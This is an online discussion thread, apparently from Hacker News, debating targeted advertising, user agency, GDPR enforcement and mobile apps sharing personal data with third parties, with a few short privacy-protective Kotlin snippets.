Customers have this expectation because VCs paid for growth. Then for another decade or so Google continued to give it away. Is it any wonder many people have a clear misunderstanding of the costs of software?
>Nobody "needs" to watch a YouTube video. Maybe they want to watch one.
Youtube's giant selection of people demonstrating every DIY repair topic you can think of (car repair, appliance repair, iPhone battery replacement, etc.) -- available nowhere else -- has literally saved me thousands of dollars (no exaggeration).
I guess one could twist that into "you didn't really _need_ to save thousands of dollar$, you just _wanted_ to."
Youtube is much more than frivolous music videos and you're too dismissive of how it helps people.
EDIT REPLY TO: "Doesn't justify their advertising."
I wasn't responding to the advertising business model. My issue is that "nobody _needs_ to watch a Youtube video" is way too dismissive.
>There's always other sources of information. There's always better sources of information.
Not always. Last week, I needed to replace an oxygen sensor on my truck and wanted some guidance on how to do it. Yes, a PDF of a vehicle service manual has diagrams etc., but that book doesn't show a video of someone actually doing it. I needed to see somebody actually put a wrench on the bolts and unplug the sensor cable. I watched 5 different mechanics do it and I'm glad I did, because there are some tricky issues that my inexperience would not have solved on my own. Vimeo and other video services didn't have this car repair content. Only Youtube.
YouTube videos have helped me a lot as well. Doesn't justify their advertising. There's always other sources of information. There's always better sources of information. I make it a point to read books now. Libraries should be valued.
> "Need" is too strong a word. Nobody "needs" to watch a YouTube video.
Circumstantially, maybe not. In high school and college, I had plenty of homework assignments that involved a YouTube video. After classes, YouTube continued to be the biggest asset to my professional development. Having access to conference talks and long-form tutorials changed my life.
For the sake of argument, let's just say I'm fixing my sink and the first result on 5 search engines is a YouTube video. What do you expect the average person to do next?
> It's exactly what I am proposing.
Well, good luck with that. I'm very curious to see who shows up to pick up the bill in your new world. It sorta sounds like your mental model ignores the existence of capitalism and free will, though.
> I'm very curious to see who shows up to pick up the bill in your new world.
I will pick up the bill for my own consumption. I have less than zero tolerance for advertising but I still buy a lot of stuff. The difference is I do it on my own terms. I won't have them actively advertising to me. When I want something, I'll ask them. When I actively seek out their products it's not advertising but information.
Side note: I consider advertising to be like a friend's recommendation if the options are curated, researched and non-scammy. If you have nothing against the influencer economy, you should have nothing against advertising. I just want ads to be done ethically.
My (actual) friends have never spent a single dime in recommending a product to me, and they never talk about products where they have a personal stake. So I can't relate to your perception.
Advertisers spend money with the aim of convincing strangers. There is always a conflict of interest.
Ads have suggested a lot of life-improvement products to me, i.e. better bedsheets, duvets, aromatherapy products, etc. I love those. I would never have checked them out otherwise. After trying them, I have suggested them to my friends. Lots of minor improvements. Here's the thesis: if we consider YouTube recommendations and Instagram recommendations to be so good that they are addictive, the same can be said about ad recommendations. Buy-conversions track whether the product has been effective and could be recommended to similar demographics. People have no problem choosing life partners based on how algos recommend profiles on dating apps, but they have an issue with ads. They want this particular aspect to be "organic"; what an irony.
Well, the point of the internet is to provide abundance to everyone at every price point and product category. Initially it was only about information, and now it is about good products and services. Ads help with that. Not every small niche product has a physical store in every city or has an app, and a listing on Amazon doesn't properly convey the worth of a product to new buyers. Physically seeing products is not necessary because you can always return them if not satisfied.
Consider another area where recommendation results in ecommerce-like activity: food delivery apps. One could say, why not visit the restaurant and eat there? Through delivery apps, I come to know about new items/cuisines and restaurants, read their reviews, and buy from them. In fact the situation is far worse in delivery apps, because you can't return a food item once tasted. Not so with other categories of products like clothing, etc.
I feel like Benedict Evans should make a primer on why ads exist and how better ads could serve society.
Ads help in that by selling my attention to corporations. I think that's a violation of my boundaries and will resist it by any means possible.
> Through delivery apps, I come to know about new items/cuisines and restaurants, read their reviews, and buy from them.
I use these store and delivery apps extremely often. I have issues with their tracking of my behavior but I don't consider them to be advertising at all.
I opened the app because I wanted to see the products and offers. That's not advertising, that's information which I specifically requested. Advertising is when the app gets in my face with nonsense I couldn't care less about while I'm trying to do something else.
Well, I go to Instagram to spend surplus time which I was going to waste anyway. If Instagram shows me an ad which it thinks fits my demographics and helps me improve my lifestyle, it is a win-win for all 3 parties involved [aggregator, sellers, buyers]. I don't care how I reached there. I am knowledgeable enough to distinguish what is relevant to me. Amazon results are littered with ads. It is similar to how Walmart would preselect products for you, leaving you little to no choice among them. Do you get a personal choice in what is put on the shelf? Walmart makes the selection based on the internal data it has gathered. It can build a profile on you.
So you ended up spending money that you were not planning to spend in the first place, because the advertisers succeeded in provoking in you a sense of necessity where none existed before.
I would rather keep advertisements specifically restricted only to those who already have a need, and are interested in choosing a commercial solution for that need.
I earn money to make my life better, not just to increase a number in my bank account. I hope you understand the concept of surplus income. Otherwise we can go back to the stone-age "just existing", "being in the moment and intimate with raw sensations" as nature intended.
To take your point further, why not abolish or ban the luxury market segment? A $10 shirt does the same job as a $500 one. Well, Apple created a necessity in making you buy a $1000 phone; it does the same job as a $400 one.
I would let the marketplace decide what new ideas should take hold in society. Taking an Uber or online dating was frowned upon; not anymore. People can change, society can adapt, and better processes can be put in place to avoid hurting the sentiments of all parties involved.
I do not advocate to abolish or ban any market segment, but rather to limit their ability to advertise only to individuals who are already on the market for the kind of product or service being advertised.
Also, congratulations on your surplus income. Many people do not enjoy that luxury.
Well, I search for products I want constantly. I'll describe what I want to Google or an actual salesperson and see what comes up. Then I'll refine the results if necessary. I don't consider that advertising. I'm looking for information and others are supplying me with it.
Well, then you are dependent on the particulars of the search engine's algorithms and what they surface to you. This is similar to Walmart preselecting 3 products from a category and asking you to make a choice among them. I would love to have some diversity in it.
Diversity is provided by friends and family. Trusted human beings. Not the highest bidder in the auctions for our attention.
Also, without advertising, search engines and the web would be a lot more trustworthy than they are today. When searching I used to get many real websites created by humans, now I see ad-funded AI-generated utterly worthless SEO spam. Advertising is literally the root cause of the enshittification of the web.
A limited number of family and friends, with their limited exposure to the products they have personally experienced, is too limiting for me. I would like to at least check out what is out there, then do research, and then buy. Don't project your personal way of doing things onto others.
I consider advertising to be fundamentally different from word of mouth networks and friend recommendations. Friends do not have conflicts of interest. They recommend things to you because they like it and think you would too, not because they stand to make billions in profit.
Advertisements are inherently untrustworthy: you must assume ads are showing you the positives and hiding the negatives.
People are generally exposed to reviews by third parties. They do their research and only then buy. Most products can be replaced/returned if you are not satisfied. A limited friend circle and its limited exposure to existing and new products should not be the determining factor in deciding what I should like or not. It should be my personal decision.
Politicians / media are inherently untrustworthy. Yet society chugs along.
It’s not as simple as the dichotomy you’ve presented. I exercise all the agency I can summon to avoid seeing ads, yet still I am presented with them and tracked so that companies can present them to me. If I had the choice I would deny them any ability to track me. So, don’t I lack some agency here? Is it my fault? And if I see an image or text I am not prepared for, my lower perceptual faculties process it before my prefrontal cortex can reason about it. Advertisers and psychologists know this, it’s why they keep doing what they do, because it works.
> If you assume agency of the user then this is a good thing, a win-win. But by treating this negatively you are assuming that the user has no agency over their actions.
Some people don't have complete and absolute agency; impulsive buying is a known issue. I bring this up because I have to constantly monitor my impulsivity due to ADHD. It creates a struggle when targeted ads bombard me with interesting stuff that I don't need but my brain tells me "but it could be useful for X".
It's exhausting. I don't want it (or at least would like more control over it), but I can't shield myself completely from targeted ads. Ad blockers on the web help a lot, and I should completely avoid popular apps with targeted ads like Instagram. I would like to see what my close friends are up to in their Instagram Stories, but I simply shouldn't use it, as I normally get bombarded with "interesting" ads all the time, which drains me by constantly battling impulsivity.
>Targeted ads increase revenues because they are focused on people with a higher probability of responding positively to the ads. If you assume agency of the user then this is a good thing, a win-win. But by treating this negatively you are assuming that the user has no agency over their actions.
That's hand-wavy and not entirely true. I have full agency, and still it's easier to ignore or mentally block out an ad about cattle supplements (I don't own cattle) than an ad about an accounting conference (I need continuing education credits for my CPA).
Ads are interruptive by design. The more targeted an ad is, the more it slows me down in my day. That is bad for me.
It's not about temptation. It's about not wanting to see ads. I don't care to know about what the ad people want to show me, and I resent being shown ads at all.
If I want a product I'll search for it. I don't want things coming to me, I want to go to them.
Without ads, how are companies supposed to get the word out about their product?
Email seems like a worse medium. Calls / texts even worse. Blog spam / SEO content is maybe the least worst? Paid (biased) reviews?
Without ads, we'd probably see a lot more paid placements (which might not be labeled as an advertisement, similar to food companies buying prime shelf space in supermarkets unbeknownst to shoppers). More influencers pushing brands directly to audiences (another form of paid placements).
I won't argue that ads are a good thing, but they serve a role in the economy. It's not obvious to me what would happen if companies suddenly couldn't advertise anymore.
E.g. you open a new restaurant. Is it ok for a restaurant to geotarget ads to the local residents? Buy an ad in the newspaper? Or do we say "not allowed" and rely on word of mouth?
If that was what advertisement was all about, maybe we wouldn't care so much.
But in the majority of cases those advertisements are lies. Fake photos, fake reviews, fake claims, fake everything. I can't justify accepting all that lying just to "get your word out". That's not what's being done.
Paid placements are already ubiquitous.
The restaurant example is all about the small company, which already gets screwed in the current marketing landscape. Small businesses put tons of money into a black box with Google/Meta Ads hoping it'll work. They're told X number of people saw their ad; most of the time you can't trace any real effect from these ads, and you have to accept that. The recent issue with YouTube counting ads incorrectly is most certainly not a unique incident, and we have no clue what's actually happening.
Maybe if all we had were these small local businesses advertising, it could actually be useful. After all, those are not the ones collecting copious amounts of data and violating everyone's privacy for the sole purpose of selling ads.
Perhaps a version of opt-in ads, or trustworthy places where you can get real recommendations, is the way to go. But because of ads and SEO this too has been destroyed. I find it infuriating that when you do want to buy something, you have to sift through so many garbage lists created for the sole purpose of showing ads and referrals. Ultimately you can only really trust a few expert sources for basically anything. The normal folks who fall for the "top X" list websites or the ads get screwed the same way, because those are just another form of false advertising.
I don't know if there's a perfect solution here, but it damn well isn't the one we've got.
> Perhaps a version of opt-in ads or trustworthy places where you can get real recommendations are the way to go.
Also unfortunate on the B2B side, sites like G2 and Capterra (basically yelp with B2B) have both turned into pay to play.
Then again, I’m not even sure what a realistic business model would be for an unbiased review site. (Maybe the answer is that it shouldn’t have a business model at all.)
The profit motive inevitably destroys these types of businesses.
There's a reason threads here on HN in the category of "what did you buy/read/do recently?" are so popular. People want reliable information, and advertising is definitely not giving it to them.
Thinking about it, nothing beats recommendation from a known trusted individual. Be it for a restaurant, an appliance, a car, etc.
This tells me how little advertising is about the discoverability of products/services. This creation of needs is 99.9% of the time unnecessary. It's only there because people want to sell regardless of how useless their product is.
If people need something, they will search for it.
Ads are a problem not for those who click on them and feel excellent about it, but for those who don't and get unwanted content shoved down their throats. If the "higher probability" from your comment is tiny, which it is, then the latter group is roughly the same as the one exposed to generic (and equally unwanted) ads.
That is, profiling does very little for the vast majority of users, but at the cost of massive privacy issues. Looking at one without considering the other is disingenuous at best.
> If you assume agency of the user then this is a good thing, a win-win.
I think a relevant difference is between "intent" related ads, say keyword ads on Google: I search for a thing and get the related info. There are cases where this is okay and helps to discover things.
And the pure tracking based ads, trying to influence me to do things I didn't inherently plan to do.
I heavily dislike the life manipulation, which often enough also seems to work (as proven by big companies spending tons of money on ads).
Or in a different realm: I'm fine with political parties having room to share their ideas and goals and to advertise them, but if companies use targeted ads to send very specific messages to different demographics, there can't be a proper debate anymore, as everybody saw something different (maybe even contradictory) and doesn't know where others are coming from (see Cambridge Analytica). This is absolutely harmful for society.
The article suggests that advertising works by manipulating cultural norms, but then it would not seem to work if ads were targeted to individuals and not to the population as a whole. For instance, the cited ad (Corona beer at the beach) was in fact widely distributed without individual targeting.
Also, the fact that misinformation campaigns work suggests that misinformation is at least one possible purpose of advertising.
I'd say the article is more about non-targeted ads, but nitpicking the example doesn't really help.
An ad can target an individual about their dandruff issue which only works because previously the non-targeted ads created social stigma around it. It's all connected.
Ads are fucking evil. No amount of rationalization can get around that. The only reason we even attempt to normalize this is because we have to generate profits at all costs.
I'd argue misinformation is embedded into advertising. There's a reason "honest ads" are a meme. Aside from a few exceptions, misinformation is the entire point of the ad: buy my thing because it's the best (it isn't) and will solve all your problems (it won't) and if you don't you're a loser (you aren't).
I have a different opinion on behavioural tracking: in most cases and contexts, human behaviour is very low entropy. Each person is unique and so on, but we are also quite predictable and malleable, and in many situations we collapse into far fewer modalities of behaviour.
By gathering enough data, it becomes possible to predict more and more of our individual behaviour; I believe that keeping this as hard as possible is a noble cause.
What agency does a lone sheep have against a pack of wolves? The issue is information asymmetry. The corporations have many more resources available to convince me to buy their product than I have when deciding how to spend my money.
When I'm asked for permission to "share data with a third party", I want to know: who is that third party? Will it be the same tomorrow as it is today? What will the third party do with the PII? If the third party is someone I trust and would value working with, then I might agree. But it's just as likely to be an organization I detest. The information is out there in press releases, journals, and legal documents, but collecting, compiling, and cross-referencing it isn't something that can be done on the spot when that consent prompt is displayed. How am I supposed to make an informed decision on how to answer?
Restricting what advertisers can do isn't taking agency away from me. It's giving me the support to better exercise my choice against better armed adversaries.
I used to feel similarly, and extrapolated this sentiment to drugs, gambling, and other vices. It was quite a grim realization, but without the shaming, the banning, the control, people will allow "their agency" to take them places that only cause them and others harm. This is why law, shaming, and religion are important: they are strong forces that protect people from "their agency" and the ills it can cause.
Who has more agency, who is more free here: a man who is a drug addict or a man who isn't a drug addict but otherwise would be without drug laws and shaming?
You may say the drug addict has more agency. You might be right, but it's not good for him or his family, and that's where law and shame come in to protect him from "ill-agency".
>This is the line of reasoning behind banning the sale of addictive substances to minors
> Targeted ads increase revenues because they are focused on people with a higher probability of responding positively to the ads.
I have no problem with targeted ads, in fact I prefer them. If I'm browsing a climbing subreddit, show me ads for climbing gear. If I'm searching for luggage online, show me ads for suitcases.
What I strenuously object to is sharing data outside of a specific vendor. If I'm browsing for suitcases on eaglecreek.com, Google and Facebook should never know and never be able to serve me any ads based on something I did outside of their services.
We do not have "agency" in the sense of a magic black box which makes optimal decisions regardless of the information we have, nor "no agency" in the sense that we'll immediately do anything because ads tell us to, but ads are incentivized to exploit human psychology as much as possible and being exposed to that is probably bad.
"You are seeing this ad on ShittySite.com because you clicked on an article about new cars on NewsSite.com 13 days ago and searched for 'Tesla' 10 days ago and subscribed to the 'Car Buyers' newsletter 8 days ago and viewed a video about used cars 7 days ago and ..."
Unfortunately, despite having appropriate laws for many years, these privacy rules are broken en masse. And why? If every EU country simply checked its top 1000 websites (and apps) proactively, this problem would not exist. Instead we have a situation where everybody does it, so you would be stupid not to follow.
Something similar holds for unsolicited mailing (both snail and e-): the rules are clear but trampled by small and large companies and institutions alike.
It is not that this government lacks the expertise or creativity. Yearly aerial images are collected to search for illegal buildings and extensions. The same government's tax department actively scrapes the web and social media to collect and store personal data, building a fraud profile on all its citizens.[0]
Regulation that is not thoughtful and enforceable is not good regulation.
Spam was made "illegal" more than a decade ago in the US and in the EU. It did not reduce the amount of spam. The same goes for the GDPR: only honest and good actors suffer, while dishonest actors and megacorps like Google gain an advantage, and because of this advantage they manage to grow their business.
For small companies the rules, especially on cookies, are intimidating and therefore ignored; however, because the companies are small, so is the impact. For larger companies, the financial incentive to bend the privacy rules is significant. And then there are the evilCorps like Uber with a trample-the-rules strategy [0] (as has any platform that abuses workers' rights). Not sure how this relates to privacy rules, but it feeds the assumption that if a company ignores one set of rules, it is also inclined to break others.
An interesting niche I have worked in is social enterprises, where a lot of people have a strong moral-high-ground feeling. Their message is supposedly not commercial, or has some higher importance, while in fact it is still commercial (fundraising, an event, ...). And these companies especially get a lot of attention.
why the distinction? if spam is illegal, it doesn't matter your size or incorporation status. if you break the rules, you've broken the rules. the ability to spam doesn't really increase with the size of the corp; a single person can hire services to spam just as effectively as evilCorp
Because an inversion of responsibility happens at some turning point of organization size.
A small company that wants to survive has to spend a lot of effort and engineering hours becoming compliant with the legislation. If they fail to do so, the following legal battle and potential fines have a high probability of bankrupting them. They must be proactive to avoid this.
Large corporations instead get to be reactive. They comply where it’s convenient and otherwise operate with an “ask forgiveness later” mindset. Legal battles and billion-dollar fines barely register; instead of being destructive events, they become minor taxes on doing business.
As much as I appreciate the spirit of the legislation, the implementation has actually empowered large companies and is squeezing out small business.
In the case of being a small business, it’s not even about being shady. Imagine you were building a simple step tracking database for a pedometer app. All it does is store a user id and some daily steps. You have zero intent to market or share it in any way, no ad personalization, no third parties, etc. Before GDPR you’d just spin this up and be fine. Now you need to deal with data consent policies, data deletion tools, potential exfiltration policies if your DB isn’t in the EU, etc. Enjoy the engineering and legal costs there.
Mega corp can just ignore most of this and pay later. It’s a massive difference.
there's no need to transmit the collected data away from the device. boom! nobody is storing data. it's all local to the device. that's an easy decision to make. you don't even need to collect an ID of any type. this app on this device counted steps. nobody outside of the app on that device needs to know.
transmitting that information to company servers is a decision that can easily not be made, and once it is made, you're already at risk. so, why do it?
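a minimal sketch of the local-only approach on Android (class and preference names are made up): all step data stays in the app's private storage, with no network code and no user ID anywhere.

    import android.content.Context

    // Everything lives in the app's private SharedPreferences file.
    // Nothing leaves the device and no identifier of any kind exists.
    class LocalStepStore(context: Context) {
        private val prefs = context.getSharedPreferences("steps", Context.MODE_PRIVATE)

        // Record the total for a given day, e.g. record("2024-05-01", 8214)
        fun record(date: String, steps: Int) {
            prefs.edit().putInt(date, steps).apply()
        }

        fun stepsOn(date: String): Int = prefs.getInt(date, 0)
    }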
Or third-party-owned eavesdroppers. Some contexts leave little option (all available products demand privacy loss): this is where the big battle will lie.
I used to use Viber for calls outside the EU, and shortly after the GDPR came into force, I checked their data partners. I kid you not, more than 1000 data harvesting companies were listed there. Keep in mind, Viber has access to so many permissions on Android that it's freaky even if they didn't have this many partners (I had XPrivacy back then). Can't imagine how compromised regular users are.
I uninstalled that malware a long time ago despite everyone around me using it. Years ago when I still had it, I found that they've been transmitting all my data - including messages apparently - to Facebook. I found this in the FB privacy console, as Viber would have never told me explicitly.
To your second concern... can't you now disable all those permissions individually? Not allowing you to then proceed with using the app would break their Google Play developer agreement, I assume. I hope.
There are plenty of other "hidden" permissions that are not exposed to user control. These include, but are not limited to, the closest cell tower near you, the SSIDs around you, access to the list of installed apps, etc. While the Android permission settings give the illusion of "privacy", the reality is far more bleak; if you ever dip your toes into Android app development you'll see it. Even now I rely on XPrivacyLua to handle permission blocking. Don't even get me started on Apple and their illusion of privacy. At least with Android you can tailor an AOSP ROM to your liking with minimal Google apps, but Apple doesn't even let you disable location from the Quick Settings menu.
But overall, nowadays it's at least possible to limit the impact – compared to the Lollipop era, for example, when everything suddenly started to look modern, unified and nice, but was still full of the same old holes.
Generally I like what noyb does, but I dislike how advertisement and product analytics seem to be thrown into the same basket. There are third-party companies like Mixpanel and Amplitude that you can send your users' data to, but they will only process it for you, and not for anyone else. Same with third-party companies like RevenueCat that help you with implementing in-app purchases. Very different situation than sending data to Google or Facebook who will then use it for everything they do.
> There are third-party companies like Mixpanel and Amplitude that you can send your users' data to, but they will only process it for you, and not for anyone else.
These tools are increasingly developing new features that let them act more like a "CDP" (customer data platform), essentially allowing you to send data from the tool to something else.
The objective of the GDPR is to give the data subject better control over how their data is used. Maybe the user doesn't want you to stalk them for analytics or "product improvement" (biggest tech industry lie of the past decade), regardless of whether other third-parties also get in on the action?
I hardly think something like a crash report diagnostic is stalking, though. Maybe you could make the case for transaction conversion funnels. That’s really a case by case basis for which analytics provider is being used and how the product owners consume them.
If your crash report service is reporting personal data, then your crash report service is written incorrectly from the perspective of respecting user privacy.
I’ve developed crash reporters for years now. The only way personal information is making its way into crash reports is if the app developers put it there. Otherwise it’s function names, the OS version, binary images that were loaded into the app, the time it happened.
Certain termination reports do contain small memory dumps and/or register values, so they could theoretically contain decodable PII. This is something the OS vendor provides, not the developer of the app or the crash reporter.
I didn't mean to make it seem like I'm calling you out specifically, just thought it worth clarifying that there's no a priori reason that PII should be included in a crash report. Sounds like we agree.
Crash reports often include pseudonymous information, like device type, OS version, etc., that helps you understand the environment your crash occurred in. They also very often include identifiers that aren't personal but let you tell whether a crash that happened 100 times hit 100 users or the same user 100 times. That's very important information to have when debugging. The jury is still out in many legal jurisdictions on whether such pseudonymous information is private enough; the classic example is IP addresses.
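A sketch of the kind of payload being described, with a random per-install ID rather than anything tied to the person (the field names are hypothetical, not any particular vendor's format):

    import java.util.UUID

    // Environment info plus a random per-install ID: enough to tell
    // "100 crashes from one user" apart from "one crash each from 100
    // users", without identifying anyone.
    data class CrashReport(
        val installId: String,         // random, generated once at first launch
        val osVersion: String,         // e.g. "Android 14"
        val deviceModel: String,       // e.g. "Pixel 7"
        val appVersion: String,
        val stackFrames: List<String>, // function names and offsets only
        val timestampMs: Long
    )

    // Created once and stored locally; it distinguishes installs,
    // not people.
    fun newInstallId(): String = UUID.randomUUID().toString()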
Pseudonymous information always carries a high risk of being abused for fingerprinting and thus deanonymisation. I feel there needs to be a trade-off, though: in public datasets, people should be very careful with pseudonymous identifiers, while in things like crash diagnostics that are never meant to be shared, I feel they're perfectly fine. That's why I dislike a general discussion where all PII is bad and evil regardless of context.
Absolutely agree! I’ve pushed back in the past when more analytics-type data was being considered. It can definitely be done anonymously and I believe users should always be given transparent options.
My stance is that by grouping all of them into the same bucket, we stop differentiating. And asking average users to make an informed, differentiated decision on a topic as complex as this feels wrong.
I get why you need legal arguments to prosecute organisations that abuse the system, but I’m worried that’s the wrong focus for now. Companies handling data will always have enough lobbyists to make their particular way of doing things technically legal (“we didn’t send the ID, we shared hashes”).
What they should be judged on is whether people understand what they are doing, and whether that clarity empowers people to support advertising approaches. Several generations of technologists have dreamed of a user-controlled platform to broadcast information, like “I’m in the market for a toaster”, and get relevant offers. Ad markets and platforms would not make less money if they empowered users to tell them what they are interested in and to stop showing ads about crypto and gambling.
> their particular way of doing things technically legal [... e.g.] shared hashes
Yes, sometimes, but an important part of it is blunt: see the post on this page from the user who installed a controversial communication application (not WsA) and found that the messages were forwarded to FB... ( https://news.ycombinator.com/item?id=37506851 )
> whether people understand what they are doing
Yes. Partially it is a matter of awareness. But there is also a large part of the population that does not care about privacy, which also reveals a perception of the world that may be outdated ("nothing to hide from decent authorities" is the idea many hold, because it is what they are used to).
I would argue that if they think there's no risk in sharing detailed personal information with authorities, that too is something they need to understand better. Privacy advocates are better at making that case, but it hasn't always been easy to hear.
> Companies handling data will always have enough lobbyist to make their particular way of doing things technically legal (“we didn’t sent ID, we shared hashes”).
> What they should be judged on is whether people understand what they are doing
Nope, it's waaayy easier to regulate this at the root of the problem rather than going person by person asking if they understand a 15-page legalese EULA they did not read.
DuckDuckGo App Tracking Protection is an app which can raise your awareness of what tracking the apps on your smartphone are doing, and probably give you a fright in the process!
Last week it blocked 31000 attempts to track me by apps on my smartphone.
I use and love DuckDuckGo Android app! The browser part suits my workflow very well. The pinned favorites, the tabs not accumulating forever like in Chrome, it's just great all around!
But it's not as privacy-friendly as you'd think. For example all favorites and bookmarks favicons are routed through their server. Which would be nice as an option, but you can't opt out. They pinky-swear they don't log it, though.
We desperately need OS level user configurable firewalls.
I need to be able to download an app and tell the OS “this app cannot access the internet in any way shape or form”.
It won’t solve all the problems. But at least for apps like “alarm clock” or whatever that should be able to work offline, the OS should guarantee it remains offline.
> We desperately need OS level user configurable firewalls
(I co-develop a FOSS network monitor for Android)
Yes, but: "OS level" firewalls are as weak as the OS itself (as in, if an app gets root, all the sandboxing and firewalling is pretty much done for). One probably must use an external firewall for better protection, but the problem is of course, one can't expect to carry it around everywhere. While for smartphones, the external firewall (fronting an AP / Wifi) is bypassed when using mobile data.
For unprivileged installed apps (as opposed to OEM apps), perhaps an un-rootable OS-level firewall works.
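For what it's worth, a sketch of how the unprivileged approach works today: a VpnService that captures one app's traffic and simply never forwards it. The package name is made up, and a real firewall also needs the manifest declaration plus the VpnService.prepare() consent flow.

    import android.app.Service
    import android.content.Intent
    import android.net.VpnService
    import android.os.ParcelFileDescriptor

    // Routes a single app into a tunnel that nothing ever reads from
    // or writes to, so all of that app's traffic is silently dropped.
    class BlackholeVpnService : VpnService() {
        private var tunnel: ParcelFileDescriptor? = null

        override fun onStartCommand(intent: Intent?, flags: Int, startId: Int): Int {
            tunnel = Builder()
                .setSession("blackhole")
                .addAddress("10.0.0.2", 32)     // dummy internal address
                .addRoute("0.0.0.0", 0)         // capture all IPv4 traffic...
                .addAllowedApplication("com.example.alarmclock") // ...for this app only
                .establish()
            return Service.START_STICKY
        }

        override fun onDestroy() {
            tunnel?.close()
            tunnel = null
        }
    }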
Also, fines are an abstract punishment—even more so when applied to a business. The C-suites need to start evaluating decisions knowing their personal freedom is at stake—not a number on a balance sheet.
I realized, after talking to a bunch of people about this, that people outside of Hacker News just don’t care about privacy. It’s unbelievably sad to me. I don’t see any solution in sight without regulation, and that simply isn’t even being discussed in the US (based on a cursory scan of active bills being considered)
This article explicitly mentions three apps running on Android. The headline suggests it also involves iOS and other Android apps, but none of that appears in the article.
Would be nice if there were a sandbox app that could run any app and produce a list of the resources it accessed and the actions it took. A bit like running a program under strace on Linux.
Android technically offers that - the actual permission list that apps need to declare is a lot larger than what gets shown to the user.
Google only shows the most egregious permission flags in normal Android builds. They also, for some reason, opted to bundle a few completely unrelated permissions into the phone-call permission notification (IIRC it is, for example, the notification shown if you want access to Bluetooth devices).
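You can inspect the full declared list yourself; a small sketch using the standard PackageManager API (the helper name is made up):

    import android.content.Context
    import android.content.pm.PackageManager

    // Returns every permission the package declares in its manifest,
    // including the ones the install/runtime UI never surfaces.
    fun declaredPermissions(context: Context, pkg: String): List<String> {
        val info = context.packageManager
            .getPackageInfo(pkg, PackageManager.GET_PERMISSIONS)
        return info.requestedPermissions?.toList() ?: emptyList()
    }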
I think there are a few Xposed plugins that show prompts for the permissions Google doesn't let you decide on, if you don't want to go full custom ROM. They can also feed fake data so your personal data isn't compromised.
I think some of it could be the unthinking inclusion of third-party libraries that seems to run all through the mobile dev community.
Just think of Crashlytics, which is incredibly popular and, on its own, isn't terribly invasive. But of course Google now owns it, so every time you go to your console, Google is pushing some further invasion of privacy to improve your insights.
There are loads of things, even apart from deliberately malicious libraries, that will use analytics to fund their free tools. What do you know about that easy-to-implement cloud-syncing DB that saves you so much time?
That's why I always avoid installing apps on my phone if I can live with the website version. Yes, websites also try to collect as much as they can, but at least there I have a browser sandbox and the ability to use uBlock Origin.
Of course, the issue is always with the apps that don't have a website version and require the internet to work. There, one needs to be much more careful about what one installs, and prefer open source when possible.
Oh yeah I never use them. I did notice McDonalds does try to push you to their app on their ordering kiosks, and they removed some kiosks to make it more difficult to order in person. But I didn't cave in :) I generally hate apps, I'm a real computer guy.
> The companies’ apps illegally access and share users’ personal data with third parties for sophisticated analytics as soon as the apps are opened. Users don’t even have the choice to consent to or prevent the sharing of their data. This approach is unlawful.
Unlawful - true. But also no different than your usual website attempting to load Google Tag Manager, Analytics or some Facebook garbage before the user has a chance to consent.
What can I do as a developer to offer that choice to the user, before it loads? What can I do about the transitive dependencies that my dependencies load?
> What can I do as a developer to offer that choice to the user, before it loads?
Don't load it until you have given the choice to the user. Dynamically load it after that, or wait for the next server round-trip. (A sketch follows at the end of this comment.)
> What can I do about the transitive dependencies that my dependencies load?
This is a significant problem for which I don't have an easier solution than making a lot of effort to properly audit and monitor your supply chain.
If you aren't sure that nothing in your supply chain is doing something dodgy, how do you justify pushing it to your users (or, at least, doing so without appropriate warning)?
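As for the first point, on mobile this can be as simple as keeping the SDK dormant until the user decides. A sketch assuming Firebase Analytics as the example SDK: with firebase_analytics_collection_enabled set to "false" in AndroidManifest.xml, it collects nothing at startup, and you flip it on only after consent.

    import android.content.Context
    import com.google.firebase.analytics.FirebaseAnalytics

    // Called from the consent dialog. Nothing is collected or sent
    // until the user explicitly opts in.
    fun onConsentDecision(context: Context, consented: Boolean) {
        FirebaseAnalytics.getInstance(context)
            .setAnalyticsCollectionEnabled(consented)
    }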
You can for example use analytics that aren't spyware, and hence don't even have to try to trick users into giving "consent" to things they don't really want.
> What can I do as a developer to offer that choice to the user, before it loads?
Implement a (sane) version of a cookie banner that sets a cookie recording whether the user is fine with loading external libraries. That cookie itself is classified as a technical cookie if used only for that purpose, and it does not require "permission" from the user. That's how this would be implemented in a GDPR-compliant way.
If the cookie is set, you can load the respective external scripts and tools. If not, you don't.
> What can I do about the transitive dependencies that my dependencies load?
That's a trickier one, and probably more on the legal side: informing the user that those dependencies exist and how they relate to each other.
This is a reason why I don't upgrade my iOS version from 15. Partly because no jailbreaks are available. And yes, from a security standpoint, with the recent exploits, I know.
I have the NetFence firewall installed, and the number of API requests applications make to third-party systems, including bank applications, is surprisingly high. These include sending metrics and telemetry to third parties, plus location data; whether GPS is on or off, these toggles can be seen within the API call.
app.adjust.com
app-measurement.com
eu-aa-online-metrix.net
firebaselogging-pa.googleapis.com
are just a few of the domains these apps make calls to. Why?
> Under the ePrivacy Directive, the mere access or storage of data on the user’s terminal device is only allowed if users give their free, informed, specific and unambiguous consent
I'm unsure what they mean by "storage of data on the [...] device", because you can't use an app without having first installed it (which already uses your device's storage), so doesn't the app have reasonable implicit permission to make use of the user's storage?
...while the part about an app being able to "access" stored data is ambiguous: does that include the app reading its own resource/assets data from its installed app package/directory? Or is it referring to apps reading the user's own (i.e. private) data like the contacts database, photos, GPS sensors, etc.? If so, then as far as I'm concerned that's not a legal or policy question but a clear and gaping security hole in the OS, because the app was somehow able to break out of the sandbox and read other data stores on the user's device.
> so doesn't the app have reasonable implicit permission to make use of the user's storage?
“Implicit permission” does not sound like “free, informed, specific and unambiguous consent”. Furthermore, the directive (ePrivacy, article 5(3)) states that consent is valid only if the user was provided with clear information about the purposes of the processing beforehand.
> does that include the app reading its own resource/assets data from its installed app-package/directory?
An app reading its own data will fall under the “strictly necessary” exception of the directive (cf. ePrivacy 5(3)). Reading other databases will depend on the purpose.
The whole article talks about users' personal data, it isn't about storing data on the device in general. If you read the article from the top I think it's pretty evident.
If an IP is PII (it is for my regulated app in many jurisdictions), perhaps every app is at risk, as SDKs generally phone home without first being routed through a server of ours.
From what I understand, you can ask for an IP if it is required for the application's functionality, i.e. "due to technical limitations, we need to know where to send the response", but you cannot automatically use it for marketing purposes, i.e. "sell the IP to third-party advertisers which can then build a profile of that IP's site visiting behavior".
Yep. My fintech serves people with bad financial history. If you’re my customer, your credit score is low and you’ve got an active loan. Simply being my customer is PII. We should be guarding IP addresses as PII.
